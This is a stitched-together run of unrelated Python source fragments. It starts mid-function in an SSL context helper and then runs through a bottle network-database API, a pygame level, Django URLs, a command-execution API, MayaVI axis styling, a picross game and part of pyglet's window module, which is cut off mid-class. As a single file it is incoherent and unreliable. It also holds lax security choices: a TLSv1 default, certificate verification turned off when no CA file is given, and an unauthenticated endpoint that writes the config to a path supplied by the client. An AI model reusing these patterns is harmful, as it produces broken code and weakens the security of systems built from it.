                ssl_version = "TLSv1"

            logging.info("SSL use version:%s", ssl_version)

        protocol_version = getattr(OpenSSL.SSL, '%s_METHOD' % ssl_version)
        ssl_context = OpenSSL.SSL.Context(protocol_version)
        if ca_certs:
            ssl_context.load_verify_locations(os.path.abspath(ca_certs))
            ssl_context.set_verify(OpenSSL.SSL.VERIFY_PEER, lambda c, x, e, d, ok: ok)
        else:
            ssl_context.set_verify(OpenSSL.SSL.VERIFY_NONE, lambda c, x, e, d, ok: ok)
        ssl_context.set_cipher_list(':'.join(cipher_suites))
        return ssl_context


import json
import bottle
from pyrouted.util import make_spec


def route(method, path):
    """Tag a handler with the HTTP method and path it should serve.

    The attributes (``http_method``, ``http_route``) are read later when the
    API class is wired into the bottle application; the handler itself is
    returned unchanged.
    """
    def tag(handler):
        handler.http_route = path
        handler.http_method = method
        return handler
    return tag


class APIv1(object):
    """Version-1 HTTP API over an NDB instance and its configuration."""

    prefix = '/v1'

    def __init__(self, ndb, config):
        self.ndb = ndb
        self.config = config

    @route('GET', '/sources')
    def sources_list(self, mode='short'):
        """List configured sources; ``?mode=full`` adds each source's config."""
        mode = bottle.request.query.mode or mode
        ret = {}
        for name, spec in self.ndb.sources.items():
            entry = {'class': spec.nl.__class__.__name__,
                     'status': spec.status}
            if mode == 'full':
                entry['config'] = spec.nl_kwarg
            ret[name] = entry
        return bottle.template('{{!ret}}', ret=json.dumps(ret))

    @route('PUT', '/sources')
    def sources_restart(self):
        """Restart the source named in the request body."""
        name = bottle.request.body.getvalue().decode('utf-8')
        self.ndb.sources[name].start()

    @route('POST', '/sources')
    def sources_add(self):
        """Register and connect a new source described in the request body."""
        payload = bottle.request.body.getvalue().decode('utf-8')
        node, spec = make_spec(payload, self.config)
        self.config['sources'].append(node)
        self.ndb.connect_source(node, spec)

    @route('DELETE', '/sources')
    def sources_del(self):
        """Drop the source named in the request body."""
        name = bottle.request.body.getvalue().decode('utf-8')
        self.config['sources'].remove(name)
        self.ndb.disconnect_source(name)

    @route('GET', '/config')
    def config_get(self):
        """Return the current configuration as JSON."""
        return bottle.template('{{!ret}}',
                               ret=json.dumps(self.config))

    @route('PUT', '/config')
    def config_dump(self):
        """Dump the configuration to the path given in the request body."""
        target = bottle.request.body.getvalue().decode('utf-8')
        self.config.dump(target)

    @route('GET', '/<name:re:(%s|%s|%s|%s|%s|%s)>' % ('interfaces',
                                                      'addresses',
                                                      'routes',
                                                      'neighbours',
                                                      'vlans',
                                                      'bridges'))
    def view(self, name):
        """Dump one NDB view as a JSON list."""
        records = list(getattr(self.ndb, name).dump())
        return bottle.template('{{!ret}}', ret=json.dumps(records))

    @route('GET', '/query/<name:re:(%s|%s|%s|%s)>' % ('nodes',
                                                      'p2p_edges',
                                                      'l2_edges',
                                                      'l3_edges'))
    def query(self, name):
        """Run one NDB query and return its rows as a JSON list."""
        rows = list(getattr(self.ndb.query, name)())
        return bottle.template('{{!ret}}', ret=json.dumps(rows))

import sys,os
#sys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))
#from ethosgame.ethos.level import Level
from ..level import Level
#from ethosgame.ethos.gameobject import GameObject
from ..gameobject import GameObject
#from ethosgame.ethos.drawnobject import DrawnObject
from ..drawnobject import DrawnObject
import pygame
from pygame.locals import *
from pygame import Color, image, font, sprite

class Level0(Level):
    """First level: a platform, an NPC subject to simple gravity, and
    mouse-drawn terrain the NPC can collide with.

    Fixes vs. original: indentation normalized to 4 spaces (the original
    mixed tabs and spaces, which breaks under Python 3 and is fragile
    under Python 2), stray semicolon removed, and print statements use
    the parenthesized form so the file parses under both Python 2 and 3.
    """

    def __init__(self):
        super(Level0, self).__init__()

        self.activeSprites = sprite.RenderClear()
        self.drawnSprites = []
        self.npc = GameObject(image.load('User.png'), 100, 50)
        self.activeSprites.add(self.npc)

        self.block1 = GameObject(image.load('platform.png'), 100, 400)
        self.activeSprites.add(self.block1)

        self.mousex = 0
        self.mousey = 0

        # The highest height our npc can climb.  If the dY with a point
        # is higher than this, the npc will just fall to his death.
        self.MAX_HILL_HEIGHT = 3

        # Corners of the rectangle currently being drawn with the mouse.
        self.toDrawRectTopLeft = (0, 0)
        self.toDrawRectBottomRight = (0, 0)

        self.drawing = False

        # Points collected while the mouse is dragged (capped at 100).
        self.pts = []

        print("Level 0 initialized.")

    def update(self, dT):
        """Advance the level by dT: apply gravity to the NPC and resolve
        collisions with drawn terrain."""
        for gobject in self.activeSprites:
            if gobject is not self.npc:
                if not gobject.rect.colliderect(self.npc.rect):
                    # Free fall: accelerate downwards up to a terminal speed.
                    if self.npc.vy < 0.3:
                        self.npc.vy += 0.1
                else:
                    # Resting on something: stop falling.
                    self.npc.vy = 0

            gobject.update(dT)

        # Gather every drawn point currently inside the NPC's rect.
        collidingPoints = []
        for drawnstuff in self.drawnSprites:
            for point in drawnstuff.pts:
                if self.npc.rect.collidepoint(point):
                    collidingPoints.append(point)
        if collidingPoints:
            self.npc.processPointCollision(collidingPoints)

    def processKeyDown(self, key):
        """Handle a key press; right arrow nudges the NPC rightwards."""
        print("You hit the key " + str(key) + "!")
        if key == pygame.K_RIGHT:
            self.npc.vx = 0.1

    def processMouseMotion(self, pos):
        """Track the cursor and, while drawing, record stroke points."""
        self.mousex = pos[0]
        self.mousey = pos[1]
        if self.drawing and len(self.pts) < 100:
            self.pts.append(pos)

    def processMouseButtonDown(self, pos):
        """Begin a new drawing stroke at pos."""
        print("Ya clicked at " + str(pos[0]) + " " + str(pos[1]) + " ya goof!")
        self.drawing = True
        self.toDrawRectTopLeft = (pos[0], pos[1])
        # Start a fresh stroke.
        if len(self.pts) > 0:
            self.pts = []

    def processMouseButtonUp(self, pos):
        """Finish the stroke and turn the collected points into terrain."""
        print("Ya let go")
        if self.drawing:
            self.drawing = False
            self.drawnSprites.append(DrawnObject(self.pts))
            self.toDrawRectBottomRight = (pos[0], pos[1])



from django.conf.urls import url

from . import views

# URL routing table for the map app; the `name` values are used for
# reverse() / {% url %} lookups.  Order matters: Django takes the first
# matching pattern.
# NOTE(review): the non-root patterns are prefix-anchored only (no trailing
# '$'), so e.g. '/mapSimXYZ' also resolves to mapSim — confirm intended.
urlpatterns = [
	url(r'^$', views.map, name='map'),
	url(r'^mapSim', views.mapSim, name='mapSim'),
	url(r'^api/getPos', views.getPos, name='getPos'),
	url(r'^api/getProjAndPos', views.getProjAndPos, name='getProjAndPos'),
]

# -*- coding: utf-8 -*-
#
from rest_framework import viewsets
from rest_framework.exceptions import ValidationError
from django.db import transaction
from django.utils.translation import ugettext as _
from django.conf import settings

from orgs.mixins.api import RootOrgViewMixin
from common.permissions import IsValidUser
from perms.utils import AssetPermissionUtil
from ..models import CommandExecution
from ..serializers import CommandExecutionSerializer
from ..tasks import run_command_execution


class CommandExecutionViewSet(RootOrgViewMixin, viewsets.ModelViewSet):
    """CRUD API over command executions owned by the requesting user."""
    serializer_class = CommandExecutionSerializer
    permission_classes = (IsValidUser,)

    def get_queryset(self):
        # A user only ever sees their own executions.
        user_id = str(self.request.user.id)
        return CommandExecution.objects.filter(user_id=user_id)

    def check_hosts(self, serializer):
        """Raise ValidationError if any target host is not permitted for
        the chosen system user."""
        validated = serializer.validated_data
        hosts = validated["hosts"]
        run_as = validated["run_as"]
        util = AssetPermissionUtil(self.request.user)
        util.filter_permissions(system_users=run_as.id)
        allowed = util.get_assets().filter(id__in=[h.id for h in hosts])
        denied = set(hosts) - set(allowed)
        if denied:
            msg = _("Not has host {} permission").format(
                [str(h.id) for h in denied]
            )
            raise ValidationError({"hosts": msg})

    def check_permissions(self, request):
        # Settings may lock common users out of command execution entirely.
        execution_disabled = not settings.SECURITY_COMMAND_EXECUTION
        if execution_disabled and request.user.is_common_user:
            return self.permission_denied(request, "Command execution disabled")
        return super().check_permissions(request)

    def perform_create(self, serializer):
        self.check_hosts(serializer)
        instance = serializer.save()
        instance.user = self.request.user
        instance.save()
        cols = self.request.query_params.get("cols", '80')
        rows = self.request.query_params.get("rows", '24')
        # Only fire the execution task once the transaction has committed.
        transaction.on_commit(lambda: run_command_execution.apply_async(
            args=(instance.id,), kwargs={"cols": cols, "rows": rows},
            task_id=str(instance.id)
        ))

# -*- coding: utf-8 -*-
"""
Created on Tue May 28 12:20:59 2013

=== MAYAXES (v1.1) ===
Generates a set of MayaVI axes using the mayavi.mlab.axes() object with a 
white background, small black text and a centred title.  Designed to better 
mimic MATLAB style plots.  

Unspecified arguments will be set to default values when mayaxes is called 
(note that default settings are configured for a figure measuring 1024 x 768 
pixels and may not display correctly on plots that are significantly larger 
or smaller). 

=== Inputs ===
'title'         Figure title text (default = 'VOID') 
'xlabel'        X axis label text (default = 'X')
'ylabel'        Y axis label text (default = 'Y')
'zlabel'        Z axis label text (default = 'Z')
'handle'        Graphics handle of object (if bounding box is to be plotted)
'title_size'    Font size of the title text (default = 25)
'ticks'         Number of divisions on each axis (default = 7)
'font_scaling'  Font scaling factor for axis text (default = 0.7)
'background'    Background colour (can be 'b' (black) or 'w' (white))

=== Notes ===
Disabling figure title: specify title_string='void' OR title_string='Void' OR 
title_string='VOID' to disable the figure title.

Disabling bounding box: specify handle='void' OR handle='Void' OR handle='VOID' 
to disable figure bounding box.

=== Usage ===
from mayaxes import mayaxes
mayaxes('Figure title','X axis label','Y axis label','Z axis label')

OR

mayaxes(title_string='TITLE',xlabel='X',ylabel='Y',zlabel='Z',title_size=25,ticks=7,font_scaling=0.7)

=== Example ===
from mayaxes import test_mayaxes
test_mayaxes()

@author: Nathan Donaldson
"""

def mayaxes(title_string='VOID', xlabel='VOID', ylabel='VOID', zlabel='VOID', handle='VOID',
            title_size=25, ticks=7, font_scaling=0.7, background='w'):
    """Create MATLAB-style MayaVI axes: small plain text, centred title.

    Parameters:
        title_string  - figure title text; any capitalisation of 'void' disables it
        xlabel/ylabel/zlabel - axis label text; 'void' (any case) disables a label
        handle        - graphics handle for the bounding box; 'void' disables it
        title_size    - font size of the title text
        ticks         - number of divisions on each axis (int)
        font_scaling  - font scaling factor for axis text (int or float)
        background    - 'w' (white) or 'b' (black)

    Returns None.  On invalid input an error is printed and the function
    returns early without importing mayavi.
    """
    # Validate inputs up front so bad arguments fail before mayavi loads.
    if not all(isinstance(s, str) for s in (title_string, xlabel, ylabel, zlabel)):
        print('ERROR: label inputs must all be strings')
        return
    elif not isinstance(ticks, int):
        print('ERROR: number of ticks must be an integer')
        return
    elif not isinstance(font_scaling, (int, float)):
        print('ERROR: font scaling factor must be an integer or a float')
        return

    # Deferred import: validation above works without a running engine.
    from mayavi.mlab import axes, title, gcf, outline

    def _is_void(value):
        # 'void' in any capitalisation disables a feature; non-string
        # handles (actual graphics objects) are never treated as 'void'.
        return isinstance(value, str) and value.lower() == 'void'

    # Create axes object
    ax = axes()

    # Font factor globally adjusts figure text size
    ax.axes.font_factor = font_scaling

    # Number of ticks along each axis
    ax.axes.number_of_labels = ticks

    # Set axis labels to input strings
    # (spaces are included for padding so that labels do not intersect with axes)
    if _is_void(xlabel):
        print('X axis label disabled')
    else:
        ax.axes.x_label = '          ' + xlabel

    if _is_void(ylabel):
        print('Y axis label disabled')
    else:
        ax.axes.y_label = ylabel + '          '

    if _is_void(zlabel):
        print('Z axis label disabled')
    else:
        ax.axes.z_label = zlabel + '     '

    # Create figure title
    if _is_void(title_string):
        print('Figure title disabled')
    else:
        text_title = title(title_string)
        text_title.x_position = 0.5
        text_title.y_position = 0.9
        text_title.property.color = (0.0, 0.0, 0.0)
        text_title.actor.text_scale_mode = 'none'
        text_title.property.font_size = title_size
        text_title.property.justification = 'centered'

    # Create bounding box around the object referenced by 'handle'
    if _is_void(handle):
        print('Bounding box disabled')
    else:
        if background == 'w':
            bounding_box = outline(handle, color=(0.0, 0.0, 0.0), opacity=0.2)
        elif background == 'b':
            bounding_box = outline(handle, color=(1.0, 1.0, 1.0), opacity=0.2)

    # Set axis labels and titles to plain (non-bold, non-italic) text
    ax.label_text_property.bold = False
    ax.label_text_property.italic = False
    ax.title_text_property.italic = False
    ax.title_text_property.bold = False

    # Reset axis range
    ax.axes.use_ranges = True

    # Set scene background, axis and text colours
    fig = gcf()
    if background == 'w':
        fig.scene.background = (1.0, 1.0, 1.0)
        ax.label_text_property.color = (0.0, 0.0, 0.0)
        ax.property.color = (0.0, 0.0, 0.0)
        ax.title_text_property.color = (0.0, 0.0, 0.0)
    elif background == 'b':
        fig.scene.background = (0.0, 0.0, 0.0)
        ax.label_text_property.color = (1.0, 1.0, 1.0)
        ax.property.color = (1.0, 1.0, 1.0)
        ax.title_text_property.color = (1.0, 1.0, 1.0)
    fig.scene.parallel_projection = True
    
def test_mayaxes():
    """Demo: plot a diminishing polar cosine series with mayaxes styling."""
    from mayaxes import mayaxes
    from scipy import sqrt, sin, meshgrid, linspace, pi
    import mayavi.mlab as mlab

    resolution = 200
    lambda_var = 3
    span = lambda_var * 2 * pi
    theta = linspace(-span, span, resolution)

    # Radially symmetric sinc-like surface.
    x, y = meshgrid(theta, theta)
    radius = sqrt(x ** 2 + y ** 2)
    z = sin(radius) / radius

    fig = mlab.figure(size=(1024, 768))
    surf = mlab.surf(theta, theta, z, colormap='jet', opacity=1.0,
                     warp_scale='auto')
    mayaxes(title_string='Figure 1: Diminishing polar cosine series',
            xlabel='X data', ylabel='Y data', zlabel='Z data', handle=surf)

    # Fixed viewpoint so the demo renders identically every run.
    camera = fig.scene.camera
    camera.position = [435.4093863309094, 434.1268937227623, 315.90311468125287]
    camera.focal_point = [94.434632665253829, 93.152140057106593, -25.071638984402856]
    camera.view_angle = 30.0
    camera.view_up = [0.0, 0.0, 1.0]
    camera.clipping_range = [287.45231734040635, 973.59247058049255]
    camera.compute_view_plane_normal()
    fig.scene.render()

    mlab.show()

#!/usr/bin/env python
#
# Copyright (C) 2007 Sascha Peilicke <sasch.pe@gmx.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
#

from random import randrange
from zipfile import ZipFile
from StringIO import StringIO

# Constants
DEFAULT_LEVELPACK = './data/default_pack.zip'  # levelpack shipped with the game

SKILL_EASY = 'Easy'			# Skill names; these values must match
SKILL_MEDIUM = 'Medium'		# the strings used in the level files!
SKILL_HARD = 'Hard'

FIELD_INVALID = 0			# Field that must stay closed
FIELD_VALID = 1				# Field that has to be opened to win
FIELD_MARKED_VALID = 2		# Valid field flagged by the player
FIELD_MARKED_INVALID = 4	# Invalid field flagged by the player
FIELD_OPEN = 8				# Field already opened by the player



class Game(object):
	"""A paint by numbers game also called nonogram.

	Fixes vs. original: __gameOver is now initialized in __init__ (it was
	only ever set in restart(), so _debug_print() raised AttributeError on
	a fresh game); the local that shadowed the builtin 'zip' is renamed;
	the .lvl file handle is closed via a context manager; the duplicated
	row/column hint logic is shared in one helper.
	"""

	def __init__(self, skill=None):
		"""Creates a picross game.

		Parameters:
			skill		- Desired skill level (None == random)
		"""
		self.__level = None
		self.__name = None
		self.__skill = None
		self.__gameOver = False		# must exist before _debug_print()/restart()
		self.__fieldsToOpen = 0
		self.__fieldsOpened = 0
		self.load(skill=skill)

	#
	# Miscellaneous methods
	#

	def _debug_print(self):
		print(self.getInfo())
		print('go: %s' % (self.__gameOver))
		for row in self.__level:
			print(row)

	#
	# Game information retrieval
	#

	def getInfo(self):
		"""Returns the name, skill and size of the level
		"""
		return self.__name,self.__skill,len(self.__level)

	def __lineHint(self, line):
		"""Returns the run-length hint (list of counts of consecutive
		valid fields) for any iterable of fields; [0] for an empty line.
		"""
		hint,count = [],0
		for item in line:
			if item == FIELD_VALID:
				count += 1
			elif count > 0:
				hint.append(count)
				count = 0
		if count > 0:
			hint.append(count)
		return hint or [0]

	def getRowHint(self,row):
		"""Returns the hint for a specific row.
		"""
		return self.__lineHint(self.__level[row])

	def getColumnHint(self,col):
		"""Returns the hint for a specific column.
		"""
		return self.__lineHint(row[col] for row in self.__level)

	def getField(self,col,row):
		"""Returns the state of the field at (col, row)."""
		return self.__level[row][col]

	def isGameWon(self):
		"""True once every valid field has been opened."""
		return self.__fieldsOpened == self.__fieldsToOpen

	#
	# Game manipulation methods
	#

	def restart(self):
		"""Reinitializes the current game 
		"""
		for i, row in enumerate(self.__level):
			for j, field in enumerate(row):
				if field == FIELD_OPEN or field == FIELD_MARKED_VALID:
					self.__level[i][j] = FIELD_VALID
				elif field == FIELD_MARKED_INVALID:
					self.__level[i][j] = FIELD_INVALID
		self.__gameOver = False
		self.__fieldsOpened = 0

	def openField(self,col,row):
		"""Opens a field; returns True if it was a valid field."""
		field = self.__level[row][col]
		if field == FIELD_VALID or field == FIELD_MARKED_VALID:
			self.__level[row][col] = FIELD_OPEN
			self.__fieldsOpened += 1
			return True
		else:
			return False

	def markField(self,col,row):
		"""Toggles the player's mark on a field; returns the new state."""
		field = self.__level[row][col]
		if field == FIELD_VALID:
			self.__level[row][col] = FIELD_MARKED_VALID
		elif field == FIELD_MARKED_VALID:
			self.__level[row][col] = FIELD_VALID
		elif field == FIELD_INVALID:
			self.__level[row][col] = FIELD_MARKED_INVALID
		elif field == FIELD_MARKED_INVALID:
			self.__level[row][col] = FIELD_INVALID
		return self.__level[row][col]

	def load(self,file=DEFAULT_LEVELPACK,skill=None):
		"""Loads a level either from a zipped levelpack or from a textfile.

		Parameters:
			file	- Can be a file path or zipped levelpack
			skill	- Desired level skill (None == random)
		"""
		if file.endswith('.lvl'):
			# Derive the skill from the file name prefix.
			# NOTE(review): this checks the whole path, not the basename,
			# so 'levels/easy1.lvl' would not match — confirm intended.
			if file.startswith('easy'):		self.__skill = SKILL_EASY
			elif file.startswith('medium'):	self.__skill = SKILL_MEDIUM
			elif file.startswith('hard'):	self.__skill = SKILL_HARD

			# Close the handle deterministically (the original leaked it).
			with open(file,'r') as level_file:
				self.__loadFileContent(level_file)

		elif file.endswith('.zip'):
			archive = ZipFile(file)		# renamed: 'zip' shadowed the builtin

			# We have to select from which files in the zipfile we
			# want to choose randomly based on the level's skill
			prefixes = {SKILL_EASY: 'easy',
						SKILL_MEDIUM: 'medium',
						SKILL_HARD: 'hard'}
			prefix = prefixes.get(skill)
			if prefix is None:
				candidates = []
			else:
				candidates = [name for name in archive.namelist()
							  if name.startswith(prefix)]

			# This should never happen in a good levelpack, but if it
			# is malformed, just pick something!
			if not candidates:
				candidates = archive.namelist()

			# Select one candidate randomly
			which = candidates[randrange(len(candidates))]
			# Set the skill variable
			if which.startswith('easy'):	self.__skill = SKILL_EASY
			elif which.startswith('medium'):self.__skill = SKILL_MEDIUM
			elif which.startswith('hard'):	self.__skill = SKILL_HARD
			# Read from zipfile and load file content
			buf = archive.read(which)
			self.__loadFileContent(StringIO(buf))

	def __loadFileContent(self,file):
		"""Actually loads the level data from a file.
		"""
		self.__level = []
		for line in file:
			if line.startswith('name:'):
				self.__name = line[5:].strip()
			elif line[0] == '0' or line[0] == '1':
				row = []
				for field in line:
					if field == '0':
						row.append(FIELD_INVALID)
					elif field == '1':
						self.__fieldsToOpen += 1
						row.append(FIELD_VALID)
				self.__level.append(row)

# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions 
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#  * Redistributions in binary form must reproduce the above copyright 
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materials provided with the
#    distribution.
#  * Neither the name of pyglet nor the names of its
#    contributors may be used to endorse or promote products
#    derived from this software without specific prior written
#    permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------

"""Windowing and user-interface events.

This module allows applications to create and display windows with an
OpenGL context.  Windows can be created with a variety of border styles 
or set fullscreen.

You can register event handlers for keyboard, mouse and window events.
For games and kiosks you can also restrict the input to your windows,
for example disabling users from switching away from the application
with certain key combinations or capturing and hiding the mouse.

Getting started
---------------

Call the Window constructor to create a new window::

    from pyglet.window import Window
    win = Window(width=640, height=480)

Attach your own event handlers::

    @win.event
    def on_key_press(symbol, modifiers):
        # ... handle this event ...

Place drawing code for the window within the `Window.on_draw` event handler::

    @win.event
    def on_draw():
        # ... drawing code ...

Call `pyglet.app.run` to enter the main event loop (by default, this
returns when all open windows are closed)::

    from pyglet import app
    app.run()

Creating a game window
----------------------

Use `Window.set_exclusive_mouse` to hide the mouse cursor and receive relative
mouse movement events.  Specify ``fullscreen=True`` as a keyword argument to
the `Window` constructor to render to the entire screen rather than opening a
window::

    win = Window(fullscreen=True)
    win.set_exclusive_mouse()

Working with multiple screens
-----------------------------

By default, fullscreen windows are opened on the primary display (typically
set by the user in their operating system settings).  You can retrieve a list
of attached screens and select one manually if you prefer.  This is useful for
opening a fullscreen window on each screen::

    display = window.get_platform().get_default_display()
    screens = display.get_screens()
    windows = []
    for screen in screens:
        windows.append(window.Window(fullscreen=True, screen=screen))

Specifying a screen has no effect if the window is not fullscreen.

Specifying the OpenGL context properties
----------------------------------------

Each window has its own context which is created when the window is created.
You can specify the properties of the context before it is created
by creating a "template" configuration::

    from pyglet import gl
    # Create template config
    config = gl.Config()
    config.stencil_size = 8
    config.aux_buffers = 4
    # Create a window using this config
    win = window.Window(config=config)

To determine if a given configuration is supported, query the screen (see
above, "Working with multiple screens")::

    configs = screen.get_matching_configs(config)
    if not configs:
        # ... config is not supported
    else:
        win = window.Window(config=configs[0])

"""
from __future__ import division
from builtins import object
from future.utils import with_metaclass

__docformat__ = 'restructuredtext'
__version__ = '$Id$'

import sys

import pyglet
from pyglet import gl
from pyglet.event import EventDispatcher
import pyglet.window.key
import pyglet.window.event

_is_epydoc = hasattr(sys, 'is_epydoc') and sys.is_epydoc


class WindowException(Exception):
    """Base class for every window-related error."""


class NoSuchDisplayException(WindowException):
    """Raised when the requested display is not available."""


class NoSuchConfigException(WindowException):
    """Raised when the requested GL configuration is not available."""


class NoSuchScreenModeException(WindowException):
    """Raised when the requested screen resolution could not be met."""


class MouseCursorException(WindowException):
    """Base class for every mouse cursor-related error."""


class MouseCursor(object):
    """Abstract base class for mouse cursors."""

    #: True when the cursor is rendered via OpenGL; system cursors are
    #: the only exception.
    drawable = True

    def draw(self, x, y):
        """Abstract render method.

        Implementations draw the cursor with its "hot" spot at the given
        coordinates.  Only the default pyglet projection (orthographic in
        window-space) may be assumed; no other aspects of the state can
        be relied upon.

        :Parameters:
            `x` : int
                X coordinate of the mouse pointer's hot spot.
            `y` : int
                Y coordinate of the mouse pointer's hot spot.

        """
        raise NotImplementedError('abstract')


class DefaultMouseCursor(MouseCursor):
    """The operating system's own cursor; not drawn by pyglet."""
    drawable = False


class ImageMouseCursor(MouseCursor):
    """A user-defined mouse cursor created from an image.

    Use this class to create your own mouse cursors and assign them
    to windows.  There are no constraints on the image size or format.
    """
    drawable = True

    def __init__(self, image, hot_x=0, hot_y=0):
        """Create a mouse cursor from an image.

        :Parameters:
            `image` : `pyglet.image.AbstractImage`
                Image to use for the mouse cursor.  It must have a
                valid ``texture`` attribute.
            `hot_x` : int
                X coordinate of the "hot" spot in the image relative to the
                image's anchor.
            `hot_y` : int
                Y coordinate of the "hot" spot in the image, relative to the
                image's anchor.
        """
        self.texture = image.get_texture()
        self.hot_x = hot_x
        self.hot_y = hot_y

    def draw(self, x, y):
        # Blit the cursor texture with standard alpha blending, offset so
        # the hot spot lands exactly on (x, y).  GL enable/current state is
        # saved first and restored afterwards, so callers' state survives.
        gl.glPushAttrib(gl.GL_ENABLE_BIT | gl.GL_CURRENT_BIT)
        gl.glColor4f(1, 1, 1, 1)
        gl.glEnable(gl.GL_BLEND)
        gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
        self.texture.blit(x - self.hot_x, y - self.hot_y, 0)
        gl.glPopAttrib()


def _PlatformEventHandler(data):
    """Decorator for platform event handlers.  
    
    Apply giving the platform-specific data needed by the window to associate
    the method with an event.  See platform-specific subclasses of this
    decorator for examples.

    The following attributes are set on the function, which is returned
    otherwise unchanged:

    _platform_event
        True
    _platform_event_data
        List of data applied to the function (permitting multiple decorators
        on the same method).
    """
    def _event_wrapper(f):
        f._platform_event = True
        if not hasattr(f, '_platform_event_data'):
            f._platform_event_data = []
        f._platform_event_data.append(data)
        return f
    return _event_wrapper


def _ViewEventHandler(f):
    f._view = True
    return f


class _WindowMetaclass(type):
    """Sets the _platform_event_names class variable on the window
    subclass.
    """
    def __init__(cls, name, bases, dict):
        cls._platform_event_names = set()
        for base in bases:
            if hasattr(base, '_platform_event_names'):
                cls._platform_event_names.update(base._platform_event_names)
        for name, func in dict.items():
            if hasattr(func, '_platform_event'):
                cls._platform_event_names.add(name)
        super(_WindowMetaclass, cls).__init__(name, bases, dict)


class BaseWindow(with_metaclass(_WindowMetaclass, EventDispatcher)):
    """Platform-independent application window.

    A window is a "heavyweight" object occupying operating system resources.
    The "client" or "content" area of a window is filled entirely with
    an OpenGL viewport.  Applications have no access to operating system
    widgets or controls; all rendering must be done via OpenGL.

    Windows may appear as floating regions or can be set to fill an entire
    screen (fullscreen).  When floating, windows may appear borderless or
    decorated with a platform-specific frame (including, for example, the
    title bar, minimize and close buttons, resize handles, and so on).

    While it is possible to set the location of a window, it is recommended
    that applications allow the platform to place it according to local
    conventions.  This will ensure it is not obscured by other windows,
    and appears on an appropriate screen for the user.

    To render into a window, you must first call `switch_to`, to make
    it the current OpenGL context.  If you use only one window in the
    application, there is no need to do this.

    :Ivariables:
        `has_exit` : bool
            True if the user has attempted to close the window.

            :deprecated: Windows are closed immediately by the default
                `on_close` handler when `pyglet.app.event_loop` is being
                used.

    """

    # Filled in by metaclass with the names of all methods on this (sub)class
    # that are platform event handlers.
    _platform_event_names = set()

    #: The default window style.
    WINDOW_STYLE_DEFAULT = None
    #: The window style for pop-up dialogs.
    WINDOW_STYLE_DIALOG = 'dialog'
    #: The window style for tool windows.
    WINDOW_STYLE_TOOL = 'tool'
    #: A window style without any decoration.
    WINDOW_STYLE_BORDERLESS = 'borderless' 

    #: The default mouse cursor.
    CURSOR_DEFAULT = None
    #: A crosshair mouse cursor.
    CURSOR_CROSSHAIR = 'crosshair'
    #: A pointing hand mouse cursor.
    CURSOR_HAND = 'hand'
    #: A "help" mouse cursor; typically a question mark and an arrow.
    CURSOR_HELP = 'help'
    #: A mouse cursor indicating that the selected operation is not permitted.
    CURSOR_NO = 'no'
    #: A mouse cursor indicating the element can be resized.
    CURSOR_SIZE = 'size'
    #: A mouse cursor indicating the element can be resized from the top
    #: border.
    CURSOR_SIZE_UP = 'size_up'
    #: A mouse cursor indicating the element can be resized from the
    #: upper-right corner.
    CURSOR_SIZE_UP_RIGHT = 'size_up_right'
    #: A mouse cursor indicating the element can be resized from the right 
    #: border.
    CURSOR_SIZE_RIGHT = 'size_right'
    #: A mouse cursor indicating the element can be resized from the lower-right
    #: corner.
    CURSOR_SIZE_DOWN_RIGHT = 'size_down_right'
    #: A mouse cursor indicating the element can be resized from the bottom 
    #: border.
    CURSOR_SIZE_DOWN = 'size_down'
    #: A mouse cursor indicating the element can be resized from the lower-left
    #: corner.
    CURSOR_SIZE_DOWN_LEFT = 'size_down_left'
    #: A mouse cursor indicating the element can be resized from the left 
    #: border.
    CURSOR_SIZE_LEFT = 'size_left'
    #: A mouse cursor indicating the element can be resized from the upper-left
    #: corner.
    CURSOR_SIZE_UP_LEFT = 'size_up_left'
    #: A mouse cursor indicating the element can be resized vertically.
    CURSOR_SIZE_UP_DOWN = 'size_up_down'
    #: A mouse cursor indicating the element can be resized horizontally.
    CURSOR_SIZE_LEFT_RIGHT = 'size_left_right'
    #: A text input mouse cursor (I-beam).
    CURSOR_TEXT = 'text'
    #: A "wait" mouse cursor; typically an hourglass or watch.
    CURSOR_WAIT = 'wait'
    #: The "wait" mouse cursor combined with an arrow.
    CURSOR_WAIT_ARROW = 'wait_arrow'

    has_exit = False

    #: Window display contents validity.  The `pyglet.app` event loop
    #: examines every window each iteration and only dispatches the `on_draw`
    #: event to windows that have `invalid` set.  By default, windows always
    #: have `invalid` set to ``True``.
    #:
    #: You can prevent redundant redraws by setting this variable to ``False``
    #: in the window's `on_draw` handler, and setting it to True again in
    #: response to any events that actually do require a window contents
    #: update.
    #:
    #: :type: bool
    #: :since: pyglet 1.1
    invalid = True

